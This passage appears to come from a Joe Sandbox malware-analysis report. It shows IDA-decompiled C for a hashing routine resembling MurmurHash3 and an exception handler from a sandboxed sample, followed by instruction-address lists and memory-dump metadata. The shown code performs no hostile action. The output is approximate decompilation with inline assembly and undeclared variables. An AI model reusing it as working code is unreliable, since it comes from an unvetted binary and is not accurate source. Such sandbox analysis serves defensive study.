                                                                                                                                                                                                                                                                  				_v72 = 0;
                                                                                                                                                                                                                                                                  				_v60 = _a4;
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				_v36 = _a8 + (__edx & 0x0000000f) >> 4;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v48 = 0;
                                                                                                                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 0x239b961b;
                                                                                                                                                                                                                                                                  				_v32 = 0xab0e9789;
                                                                                                                                                                                                                                                                  				_v16 = 0x38b34ae5;
                                                                                                                                                                                                                                                                  				_v64 = 0xa1e38b93;
                                                                                                                                                                                                                                                                  				_v44 = (_v36 << 4) + _v60;
                                                                                                                                                                                                                                                                  				_v76 =  ~_v36;
                                                                                                                                                                                                                                                                  				while(_v76 != 0) {
                                                                                                                                                                                                                                                                  					_v92 = E00408B00(_v44, _v76 << 2);
                                                                                                                                                                                                                                                                  					_v88 = E00408B00(_v44, 1 + _v76 * 4);
                                                                                                                                                                                                                                                                  					_v84 = E00408B00(_v44, 2 + _v76 * 4);
                                                                                                                                                                                                                                                                  					_t336 = E00408B00(_v44, 3 + _v76 * 4);
                                                                                                                                                                                                                                                                  					_t502 = _t502 + 0x20;
                                                                                                                                                                                                                                                                  					_v80 = _t336;
                                                                                                                                                                                                                                                                  					_v92 = _v92 * 0x239b961b;
                                                                                                                                                                                                                                                                  					asm("rol ecx, 0xf");
                                                                                                                                                                                                                                                                  					_v92 = _v92 * 0xab0e9789;
                                                                                                                                                                                                                                                                  					_v20 = _v20 ^ _v92;
                                                                                                                                                                                                                                                                  					asm("rol ecx, 0x13");
                                                                                                                                                                                                                                                                  					_v20 = _v20 + _v8;
                                                                                                                                                                                                                                                                  					_v20 = 0x561ccd1b + _v20 * 5;
                                                                                                                                                                                                                                                                  					_v88 = _v88 * 0xab0e9789;
                                                                                                                                                                                                                                                                  					asm("rol edx, 0x10");
                                                                                                                                                                                                                                                                  					_v88 = _v88 * 0x38b34ae5;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v88;
                                                                                                                                                                                                                                                                  					asm("rol edx, 0x11");
                                                                                                                                                                                                                                                                  					_v8 = _v8 + _v48;
                                                                                                                                                                                                                                                                  					_v8 = 0xbcaa747 + _v8 * 5;
                                                                                                                                                                                                                                                                  					_v84 = _v84 * 0x38b34ae5;
                                                                                                                                                                                                                                                                  					asm("rol eax, 0x11");
                                                                                                                                                                                                                                                                  					_v84 = _v84 * 0xa1e38b93;
                                                                                                                                                                                                                                                                  					_v48 = _v48 ^ _v84;
                                                                                                                                                                                                                                                                  					asm("rol eax, 0xf");
                                                                                                                                                                                                                                                                  					_v48 = _v48 + _v40;
                                                                                                                                                                                                                                                                  					_v48 = _v48 * 5 - 0x6932e3cb;
                                                                                                                                                                                                                                                                  					_v80 = _v80 * 0xa1e38b93;
                                                                                                                                                                                                                                                                  					asm("rol ecx, 0x12");
                                                                                                                                                                                                                                                                  					_v80 = _v80 * 0x239b961b;
                                                                                                                                                                                                                                                                  					_v40 = _v40 ^ _v80;
                                                                                                                                                                                                                                                                  					asm("rol ecx, 0xd");
                                                                                                                                                                                                                                                                  					_v40 = _v40 + _v20;
                                                                                                                                                                                                                                                                  					_v40 = 0x32ac3b17 + _v40 * 5;
                                                                                                                                                                                                                                                                  					_v76 = _v76 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v28 = (_v36 << 4) + _v60;
                                                                                                                                                                                                                                                                  				_v68 = 0;
                                                                                                                                                                                                                                                                  				_v56 = 0;
                                                                                                                                                                                                                                                                  				_v52 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v96 = _a8 & 0x0000000f;
                                                                                                                                                                                                                                                                  				_v96 = _v96 - 1;
                                                                                                                                                                                                                                                                  				if(_v96 <= 0xe) {
                                                                                                                                                                                                                                                                  					switch( *((intOrPtr*)(_v96 * 4 +  &M004091A4))) {
                                                                                                                                                                                                                                                                  						case 0:
                                                                                                                                                                                                                                                                  							L20:
                                                                                                                                                                                                                                                                  							_v68 =  *_v28 & 0x000000ff ^ _v68;
                                                                                                                                                                                                                                                                  							_v68 = _v68 * 0x239b961b;
                                                                                                                                                                                                                                                                  							asm("rol eax, 0xf");
                                                                                                                                                                                                                                                                  							_v68 = _v68 * 0xab0e9789;
                                                                                                                                                                                                                                                                  							_v20 = _v20 ^ _v68;
                                                                                                                                                                                                                                                                  							goto L21;
                                                                                                                                                                                                                                                                  						case 1:
                                                                                                                                                                                                                                                                  							L19:
                                                                                                                                                                                                                                                                  							_v68 = (_v28[1] & 0x000000ff) << 0x00000008 ^ _v68;
                                                                                                                                                                                                                                                                  							goto L20;
                                                                                                                                                                                                                                                                  						case 2:
                                                                                                                                                                                                                                                                  							L18:
                                                                                                                                                                                                                                                                  							_v68 = (_v28[2] & 0x000000ff) << 0x00000010 ^ _v68;
                                                                                                                                                                                                                                                                  							goto L19;
                                                                                                                                                                                                                                                                  						case 3:
                                                                                                                                                                                                                                                                  							L17:
                                                                                                                                                                                                                                                                  							_v68 = (_v28[3] & 0x000000ff) << 0x00000018 ^ _v68;
                                                                                                                                                                                                                                                                  							goto L18;
                                                                                                                                                                                                                                                                  						case 4:
                                                                                                                                                                                                                                                                  							L16:
                                                                                                                                                                                                                                                                  							_v56 = _v28[4] & 0x000000ff ^ _v56;
                                                                                                                                                                                                                                                                  							_v56 = _v56 * 0xab0e9789;
                                                                                                                                                                                                                                                                  							asm("rol eax, 0x10");
                                                                                                                                                                                                                                                                  							_v56 = _v56 * 0x38b34ae5;
                                                                                                                                                                                                                                                                  							_v8 = _v8 ^ _v56;
                                                                                                                                                                                                                                                                  							goto L17;
                                                                                                                                                                                                                                                                  						case 5:
                                                                                                                                                                                                                                                                  							L15:
                                                                                                                                                                                                                                                                  							_v56 = (_v28[5] & 0x000000ff) << 0x00000008 ^ _v56;
                                                                                                                                                                                                                                                                  							goto L16;
                                                                                                                                                                                                                                                                  						case 6:
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							_v56 = (_v28[6] & 0x000000ff) << 0x00000010 ^ _v56;
                                                                                                                                                                                                                                                                  							goto L15;
                                                                                                                                                                                                                                                                  						case 7:
                                                                                                                                                                                                                                                                  							L13:
                                                                                                                                                                                                                                                                  							_v56 = (_v28[7] & 0x000000ff) << 0x00000018 ^ _v56;
                                                                                                                                                                                                                                                                  							goto L14;
                                                                                                                                                                                                                                                                  						case 8:
                                                                                                                                                                                                                                                                  							L12:
                                                                                                                                                                                                                                                                  							_v52 = _v28[8] & 0x000000ff ^ _v52;
                                                                                                                                                                                                                                                                  							_v52 = _v52 * 0x38b34ae5;
                                                                                                                                                                                                                                                                  							asm("rol eax, 0x11");
                                                                                                                                                                                                                                                                  							_v52 = _v52 * 0xa1e38b93;
                                                                                                                                                                                                                                                                  							_v48 = _v48 ^ _v52;
                                                                                                                                                                                                                                                                  							goto L13;
                                                                                                                                                                                                                                                                  						case 9:
                                                                                                                                                                                                                                                                  							L11:
                                                                                                                                                                                                                                                                  							_v52 = (_v28[9] & 0x000000ff) << 0x00000008 ^ _v52;
                                                                                                                                                                                                                                                                  							goto L12;
                                                                                                                                                                                                                                                                  						case 0xa:
                                                                                                                                                                                                                                                                  							L10:
                                                                                                                                                                                                                                                                  							_v52 = (_v28[0xa] & 0x000000ff) << 0x00000010 ^ _v52;
                                                                                                                                                                                                                                                                  							goto L11;
                                                                                                                                                                                                                                                                  						case 0xb:
                                                                                                                                                                                                                                                                  							L9:
                                                                                                                                                                                                                                                                  							_v52 = (_v28[0xb] & 0x000000ff) << 0x00000018 ^ _v52;
                                                                                                                                                                                                                                                                  							goto L10;
                                                                                                                                                                                                                                                                  						case 0xc:
                                                                                                                                                                                                                                                                  							L8:
                                                                                                                                                                                                                                                                  							_v12 = _v28[0xc] & 0x000000ff ^ _v12;
                                                                                                                                                                                                                                                                  							_v12 = _v12 * 0xa1e38b93;
                                                                                                                                                                                                                                                                  							asm("rol eax, 0x12");
                                                                                                                                                                                                                                                                  							_v12 = _v12 * 0x239b961b;
                                                                                                                                                                                                                                                                  							_v40 = _v40 ^ _v12;
                                                                                                                                                                                                                                                                  							goto L9;
                                                                                                                                                                                                                                                                  						case 0xd:
                                                                                                                                                                                                                                                                  							L7:
                                                                                                                                                                                                                                                                  							_v12 = (_v28[0xd] & 0x000000ff) << 0x00000008 ^ _v12;
                                                                                                                                                                                                                                                                  							goto L8;
                                                                                                                                                                                                                                                                  						case 0xe:
                                                                                                                                                                                                                                                                  							_v12 = (_v28[0xe] & 0x000000ff) << 0x00000010 ^ _v12;
                                                                                                                                                                                                                                                                  							goto L7;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L21:
                                                                                                                                                                                                                                                                  				_v20 = _v20 ^ _a8;
                                                                                                                                                                                                                                                                  				_v8 = _v8 ^ _a8;
                                                                                                                                                                                                                                                                  				_v48 = _v48 ^ _a8;
                                                                                                                                                                                                                                                                  				_v40 = _v40 ^ _a8;
                                                                                                                                                                                                                                                                  				_v20 = _v20 + _v8;
                                                                                                                                                                                                                                                                  				_v20 = _v20 + _v48;
                                                                                                                                                                                                                                                                  				_v20 = _v20 + _v40;
                                                                                                                                                                                                                                                                  				_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                  				_v48 = _v48 + _v20;
                                                                                                                                                                                                                                                                  				_v40 = _v40 + _v20;
                                                                                                                                                                                                                                                                  				_v20 = E00408B10(_v20);
                                                                                                                                                                                                                                                                  				_v8 = E00408B10(_v8);
                                                                                                                                                                                                                                                                  				_v48 = E00408B10(_v48);
                                                                                                                                                                                                                                                                  				_v40 = E00408B10(_v40);
                                                                                                                                                                                                                                                                  				_v20 = _v20 + _v8;
                                                                                                                                                                                                                                                                  				_v20 = _v20 + _v48;
                                                                                                                                                                                                                                                                  				_v20 = _v20 + _v40;
                                                                                                                                                                                                                                                                  				_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                  				_v48 = _v48 + _v20;
                                                                                                                                                                                                                                                                  				_v40 = _v40 + _v20;
                                                                                                                                                                                                                                                                  				 *_a12 = _v20;
                                                                                                                                                                                                                                                                  				_a12[1] = _v8;
                                                                                                                                                                                                                                                                  				_a12[2] = _v48;
                                                                                                                                                                                                                                                                  				_t306 = _v40;
                                                                                                                                                                                                                                                                  				_a12[3] = _t306;
                                                                                                                                                                                                                                                                  				return _t306;
                                                                                                                                                                                                                                                                  			}





























                                                                                                                                                                                                                                                                  0x00408cc6
                                                                                                                                                                                                                                                                  0x00408cd0
                                                                                                                                                                                                                                                                  0x00408cd6
                                                                                                                                                                                                                                                                  0x00408cdf
                                                                                                                                                                                                                                                                  0x00408ce2
                                                                                                                                                                                                                                                                  0x00408ce9
                                                                                                                                                                                                                                                                  0x00408cf0
                                                                                                                                                                                                                                                                  0x00408cf7
                                                                                                                                                                                                                                                                  0x00408cfe
                                                                                                                                                                                                                                                                  0x00408d05
                                                                                                                                                                                                                                                                  0x00408d0c
                                                                                                                                                                                                                                                                  0x00408d13
                                                                                                                                                                                                                                                                  0x00408d23
                                                                                                                                                                                                                                                                  0x00408d2b
                                                                                                                                                                                                                                                                  0x00408d39
                                                                                                                                                                                                                                                                  0x00408d56
                                                                                                                                                                                                                                                                  0x00408d70
                                                                                                                                                                                                                                                                  0x00408d8a
                                                                                                                                                                                                                                                                  0x00408d9c
                                                                                                                                                                                                                                                                  0x00408da1
                                                                                                                                                                                                                                                                  0x00408da4
                                                                                                                                                                                                                                                                  0x00408db0
                                                                                                                                                                                                                                                                  0x00408db6
                                                                                                                                                                                                                                                                  0x00408dc5
                                                                                                                                                                                                                                                                  0x00408dce
                                                                                                                                                                                                                                                                  0x00408dd4
                                                                                                                                                                                                                                                                  0x00408de0
                                                                                                                                                                                                                                                                  0x00408dee
                                                                                                                                                                                                                                                                  0x00408dfa
                                                                                                                                                                                                                                                                  0x00408e00
                                                                                                                                                                                                                                                                  0x00408e0f
                                                                                                                                                                                                                                                                  0x00408e18
                                                                                                                                                                                                                                                                  0x00408e1e
                                                                                                                                                                                                                                                                  0x00408e2a
                                                                                                                                                                                                                                                                  0x00408e39
                                                                                                                                                                                                                                                                  0x00408e45
                                                                                                                                                                                                                                                                  0x00408e4b
                                                                                                                                                                                                                                                                  0x00408e5a
                                                                                                                                                                                                                                                                  0x00408e63
                                                                                                                                                                                                                                                                  0x00408e69
                                                                                                                                                                                                                                                                  0x00408e75
                                                                                                                                                                                                                                                                  0x00408e84
                                                                                                                                                                                                                                                                  0x00408e90
                                                                                                                                                                                                                                                                  0x00408e96
                                                                                                                                                                                                                                                                  0x00408ea5
                                                                                                                                                                                                                                                                  0x00408eae
                                                                                                                                                                                                                                                                  0x00408eb4
                                                                                                                                                                                                                                                                  0x00408ec0
                                                                                                                                                                                                                                                                  0x00408ece
                                                                                                                                                                                                                                                                  0x00408d36
                                                                                                                                                                                                                                                                  0x00408d36
                                                                                                                                                                                                                                                                  0x00408edf
                                                                                                                                                                                                                                                                  0x00408ee2
                                                                                                                                                                                                                                                                  0x00408ee9
                                                                                                                                                                                                                                                                  0x00408ef0
                                                                                                                                                                                                                                                                  0x00408ef7
                                                                                                                                                                                                                                                                  0x00408f04
                                                                                                                                                                                                                                                                  0x00408f0d
                                                                                                                                                                                                                                                                  0x00408f14
                                                                                                                                                                                                                                                                  0x00408f1d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409079
                                                                                                                                                                                                                                                                  0x00409082
                                                                                                                                                                                                                                                                  0x0040908e
                                                                                                                                                                                                                                                                  0x00409094
                                                                                                                                                                                                                                                                  0x004090a3
                                                                                                                                                                                                                                                                  0x004090ac
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409069
                                                                                                                                                                                                                                                                  0x00409076
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409059
                                                                                                                                                                                                                                                                  0x00409066
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409049
                                                                                                                                                                                                                                                                  0x00409056
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409012
                                                                                                                                                                                                                                                                  0x0040901c
                                                                                                                                                                                                                                                                  0x00409028
                                                                                                                                                                                                                                                                  0x0040902e
                                                                                                                                                                                                                                                                  0x0040903d
                                                                                                                                                                                                                                                                  0x00409046
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409002
                                                                                                                                                                                                                                                                  0x0040900f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408ff2
                                                                                                                                                                                                                                                                  0x00408fff
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408fe2
                                                                                                                                                                                                                                                                  0x00408fef
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408fab
                                                                                                                                                                                                                                                                  0x00408fb5
                                                                                                                                                                                                                                                                  0x00408fc1
                                                                                                                                                                                                                                                                  0x00408fc7
                                                                                                                                                                                                                                                                  0x00408fd6
                                                                                                                                                                                                                                                                  0x00408fdf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408f9b
                                                                                                                                                                                                                                                                  0x00408fa8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408f8b
                                                                                                                                                                                                                                                                  0x00408f98
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408f7b
                                                                                                                                                                                                                                                                  0x00408f88
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408f44
                                                                                                                                                                                                                                                                  0x00408f4e
                                                                                                                                                                                                                                                                  0x00408f5a
                                                                                                                                                                                                                                                                  0x00408f60
                                                                                                                                                                                                                                                                  0x00408f6f
                                                                                                                                                                                                                                                                  0x00408f78
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408f34
                                                                                                                                                                                                                                                                  0x00408f41
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408f31
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408f1d
                                                                                                                                                                                                                                                                  0x004090af
                                                                                                                                                                                                                                                                  0x004090b5
                                                                                                                                                                                                                                                                  0x004090be
                                                                                                                                                                                                                                                                  0x004090c7
                                                                                                                                                                                                                                                                  0x004090d0
                                                                                                                                                                                                                                                                  0x004090d9
                                                                                                                                                                                                                                                                  0x004090e2
                                                                                                                                                                                                                                                                  0x004090eb
                                                                                                                                                                                                                                                                  0x004090f4
                                                                                                                                                                                                                                                                  0x004090fd
                                                                                                                                                                                                                                                                  0x00409106
                                                                                                                                                                                                                                                                  0x00409115
                                                                                                                                                                                                                                                                  0x00409124
                                                                                                                                                                                                                                                                  0x00409133
                                                                                                                                                                                                                                                                  0x00409142
                                                                                                                                                                                                                                                                  0x0040914b
                                                                                                                                                                                                                                                                  0x00409154
                                                                                                                                                                                                                                                                  0x0040915d
                                                                                                                                                                                                                                                                  0x00409166
                                                                                                                                                                                                                                                                  0x0040916f
                                                                                                                                                                                                                                                                  0x00409178
                                                                                                                                                                                                                                                                  0x00409181
                                                                                                                                                                                                                                                                  0x00409189
                                                                                                                                                                                                                                                                  0x00409192
                                                                                                                                                                                                                                                                  0x00409198
                                                                                                                                                                                                                                                                  0x0040919b
                                                                                                                                                                                                                                                                  0x004091a1

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e9003ecd18dc3ab16ec30c87baa351899e912a597da4c736ca5349331eec5d38
                                                                                                                                                                                                                                                                  • Instruction ID: 2ea193653643e8d380fae7f149e7398379f19b6d0687c72345bd92e3f17347b5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9003ecd18dc3ab16ec30c87baa351899e912a597da4c736ca5349331eec5d38
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24128CB4D012199FCB48CF99D991AAEFBB2BF88300F24856AE415BB345D734AA01CF54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                                                                                                                  			E0040EA08(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				char _v12;
                                                                                                                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                                                                                                                  				signed int* _t43;
                                                                                                                                                                                                                                                                  				char _t44;
                                                                                                                                                                                                                                                                  				void* _t46;
                                                                                                                                                                                                                                                                  				void* _t49;
                                                                                                                                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                                                                                                                                  				void* _t54;
                                                                                                                                                                                                                                                                  				void* _t65;
                                                                                                                                                                                                                                                                  				long _t66;
                                                                                                                                                                                                                                                                  				signed int* _t80;
                                                                                                                                                                                                                                                                  				signed int* _t82;
                                                                                                                                                                                                                                                                  				void* _t84;
                                                                                                                                                                                                                                                                  				signed int _t86;
                                                                                                                                                                                                                                                                  				void* _t89;
                                                                                                                                                                                                                                                                  				void* _t95;
                                                                                                                                                                                                                                                                  				void* _t96;
                                                                                                                                                                                                                                                                  				void* _t99;
                                                                                                                                                                                                                                                                  				void* _t106;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t43 = _t84;
                                                                                                                                                                                                                                                                  				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                                  				_t89 = _t95;
                                                                                                                                                                                                                                                                  				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                                  				_push(_t65);
                                                                                                                                                                                                                                                                  				_push(_t84);
                                                                                                                                                                                                                                                                  				_push(_t89);
                                                                                                                                                                                                                                                                  				asm("cld");
                                                                                                                                                                                                                                                                  				_t66 = _a8;
                                                                                                                                                                                                                                                                  				_t44 = _a4;
                                                                                                                                                                                                                                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                                  					_push(_t89);
                                                                                                                                                                                                                                                                  					E0040EB93(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                                  					_t46 = 1;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v12 = _t44;
                                                                                                                                                                                                                                                                  					_v8 = _a12;
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                                  					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                                  					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                  					_t49 = E0040EC4D(_t66);
                                                                                                                                                                                                                                                                  					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                                  					if(_t49 == 0) {
                                                                                                                                                                                                                                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                                  						goto L11;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                                                                                                                                                  								L8:
                                                                                                                                                                                                                                                                  								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_t54 =  *_t53();
                                                                                                                                                                                                                                                                  								_t89 = _t89;
                                                                                                                                                                                                                                                                  								_t86 = _t86;
                                                                                                                                                                                                                                                                  								_t66 = _a8;
                                                                                                                                                                                                                                                                  								_t55 = _t54;
                                                                                                                                                                                                                                                                  								_t106 = _t54;
                                                                                                                                                                                                                                                                  								if(_t106 == 0) {
                                                                                                                                                                                                                                                                  									goto L8;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									if(_t106 < 0) {
                                                                                                                                                                                                                                                                  										_t46 = 0;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                  										E0040EB38(_t55, _t66);
                                                                                                                                                                                                                                                                  										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                                  										E0040EB93(_t89, _t66, 0);
                                                                                                                                                                                                                                                                  										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                                  										E0040EC2F(_t82[2], 1);
                                                                                                                                                                                                                                                                  										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                                  										_t66 = 0;
                                                                                                                                                                                                                                                                  										_t86 = 0;
                                                                                                                                                                                                                                                                  										 *(_t82[2])();
                                                                                                                                                                                                                                                                  										goto L8;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L13;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L11:
                                                                                                                                                                                                                                                                  						_t46 = 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L13:
                                                                                                                                                                                                                                                                  				return _t46;
                                                                                                                                                                                                                                                                  			}























                                                                                                                                                                                                                                                                  0x0040ea0c
                                                                                                                                                                                                                                                                  0x0040ea0d
                                                                                                                                                                                                                                                                  0x0040ea0e
                                                                                                                                                                                                                                                                  0x0040ea11
                                                                                                                                                                                                                                                                  0x0040ea13
                                                                                                                                                                                                                                                                  0x0040ea16
                                                                                                                                                                                                                                                                  0x0040ea17
                                                                                                                                                                                                                                                                  0x0040ea19
                                                                                                                                                                                                                                                                  0x0040ea1a
                                                                                                                                                                                                                                                                  0x0040ea1b
                                                                                                                                                                                                                                                                  0x0040ea1e
                                                                                                                                                                                                                                                                  0x0040ea28
                                                                                                                                                                                                                                                                  0x0040ead9
                                                                                                                                                                                                                                                                  0x0040eae0
                                                                                                                                                                                                                                                                  0x0040eae9
                                                                                                                                                                                                                                                                  0x0040ea2e
                                                                                                                                                                                                                                                                  0x0040ea2e
                                                                                                                                                                                                                                                                  0x0040ea34
                                                                                                                                                                                                                                                                  0x0040ea3a
                                                                                                                                                                                                                                                                  0x0040ea3d
                                                                                                                                                                                                                                                                  0x0040ea40
                                                                                                                                                                                                                                                                  0x0040ea44
                                                                                                                                                                                                                                                                  0x0040ea49
                                                                                                                                                                                                                                                                  0x0040ea4e
                                                                                                                                                                                                                                                                  0x0040eace
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ea50
                                                                                                                                                                                                                                                                  0x0040ea50
                                                                                                                                                                                                                                                                  0x0040ea5c
                                                                                                                                                                                                                                                                  0x0040ea5e
                                                                                                                                                                                                                                                                  0x0040eab9
                                                                                                                                                                                                                                                                  0x0040eab9
                                                                                                                                                                                                                                                                  0x0040eabf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ea60
                                                                                                                                                                                                                                                                  0x0040ea6f
                                                                                                                                                                                                                                                                  0x0040ea71
                                                                                                                                                                                                                                                                  0x0040ea72
                                                                                                                                                                                                                                                                  0x0040ea73
                                                                                                                                                                                                                                                                  0x0040ea76
                                                                                                                                                                                                                                                                  0x0040ea76
                                                                                                                                                                                                                                                                  0x0040ea78
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ea7a
                                                                                                                                                                                                                                                                  0x0040ea7a
                                                                                                                                                                                                                                                                  0x0040eac4
                                                                                                                                                                                                                                                                  0x0040ea7c
                                                                                                                                                                                                                                                                  0x0040ea7c
                                                                                                                                                                                                                                                                  0x0040ea80
                                                                                                                                                                                                                                                                  0x0040ea88
                                                                                                                                                                                                                                                                  0x0040ea8d
                                                                                                                                                                                                                                                                  0x0040ea92
                                                                                                                                                                                                                                                                  0x0040ea9e
                                                                                                                                                                                                                                                                  0x0040eaa6
                                                                                                                                                                                                                                                                  0x0040eaad
                                                                                                                                                                                                                                                                  0x0040eab3
                                                                                                                                                                                                                                                                  0x0040eab7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040eab7
                                                                                                                                                                                                                                                                  0x0040ea7a
                                                                                                                                                                                                                                                                  0x0040ea78
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ea5e
                                                                                                                                                                                                                                                                  0x0040ead2
                                                                                                                                                                                                                                                                  0x0040ead2
                                                                                                                                                                                                                                                                  0x0040ead2
                                                                                                                                                                                                                                                                  0x0040ea4e
                                                                                                                                                                                                                                                                  0x0040eaee
                                                                                                                                                                                                                                                                  0x0040eaf5

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
